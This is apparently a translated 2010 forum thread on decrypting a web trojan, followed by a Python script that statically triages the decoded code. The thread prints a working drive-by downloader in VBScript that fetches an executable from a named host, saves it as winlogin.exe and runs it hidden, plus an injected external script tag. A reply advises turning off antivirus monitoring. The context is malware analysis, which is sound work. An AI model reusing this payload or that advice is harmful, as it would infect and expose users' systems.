带脚镣跳舞 - 2010-1-6 15:11:00
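When I try to decrypt this web trojan in freshow, my antivirus software reports a script virus and the connection fails. Is there any other way to decrypt it?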

networkedition - 2010-1-6 15:14:00
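When decrypting, it is recommended to temporarily turn off the monitoring of your security software. In general this will not infect the system; if you are worried, you can do the decryption in a virtual machine.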
带脚镣跳舞 - 2010-1-6 15:24:00
<SCRIPT>var Words="<html>
<script language="VBScript">
on error resume next
dl = "http://www.zzjsxy.com/al\system.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>system</title>
</head><body>
<center></center>
</body></html>
";document.write(unescape(Words))</SCRIPT>
http://www.nc-ndt.com/index.asp<script language="javascript" src="http://wswmxz.vicp.net/index.htm"></script>
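This is the result after decryption.
The result given officially is http://www.zzjsxy.com/alsystem.exe
But the code contains a src as well as al\system.exe
Could the moderator please clear this up?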
networkedition - 2010-1-6 15:31:00
http://www.zzjsxy.com/al\system.exe is the one; just change the slash:
http://www.zzjsxy.com/al/system.exe
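
Added example, not part of the thread and not freshow's code: the decoded script can be triaged as plain text, without loading it in a browser. The sketch folds the script's string assignments and & concatenations to recover the download URL (with the backslash changed to a slash, as in the reply above) and the component names the script assembles. The host name in the sample is a constructed placeholder.

```python
import re

# Constructed sample modelled on the decoded script in the thread; the host is a placeholder.
SAMPLE = r'''
dl = "http://downloader.example/al\system.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
set Q = df.createobject("Shell.Application","")
'''

TERM = r'(?:"(?:[^"]|"")*"|\w+)'  # a string literal or a variable name
ASSIGN = re.compile(rf'^\s*(?:set\s+)?(\w+)\s*=\s*({TERM}(?:\s*&\s*{TERM})*)\s*$', re.I)
# Components the thread's script instantiates (download, write to disk, run).
WATCH = {"microsoft.xmlhttp", "adodb.stream", "scripting.filesystemobject", "shell.application"}
CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"  # classid set on the <object> in the thread

def resolve_strings(script):
    """Fold literal and '&'-concatenated assignments into values; nothing is executed."""
    env = {}
    for line in script.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue  # method calls and property writes are ignored
        parts = [t[1:-1].replace('""', '"') if t.startswith('"') else env.get(t.lower())
                 for t in re.findall(TERM, m.group(2))]
        if None not in parts:  # skip expressions that use an unknown variable
            env[m.group(1).lower()] = "".join(parts)
    return env

def triage(script):
    """Return normalised URLs, watched component names and whether the classid is present."""
    env = resolve_strings(script)
    literals = [s.replace('""', '"') for s in re.findall(r'"((?:[^"]|"")*)"', script)]
    values = list(env.values()) + literals
    urls = sorted({v.replace("\\", "/") for v in values if re.match(r"https?://", v, re.I)})
    progids = sorted({v.lower() for v in values if v.lower() in WATCH})
    return {"urls": urls, "progids": progids, "clsid": CLSID in script.lower()}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The component name split across a1 to a4 only shows up after folding, which is why a plain keyword search over the decoded text misses it.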